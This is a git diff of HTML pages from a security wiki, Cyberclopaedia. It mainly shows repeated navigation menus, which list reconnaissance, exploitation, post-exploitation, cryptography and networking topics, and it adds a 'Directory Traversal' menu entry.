    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -221,22 +221,6 @@

Security

- - diff --git a/docs/Cryptography/Private-Key Cryptography/index.html b/docs/Cryptography/Private-Key Cryptography/index.html index e721f87a..41244c5f 100644 --- a/docs/Cryptography/Private-Key Cryptography/index.html +++ b/docs/Cryptography/Private-Key Cryptography/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -202,22 +202,6 @@

Introduction - - diff --git a/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html b/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html index b8f0a798..2ac68da4 100644 --- a/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html +++ b/docs/Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -324,22 +324,6 @@

Cyclic Groups - - diff --git a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html index 6341650a..910cded7 100644 --- a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html +++ b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
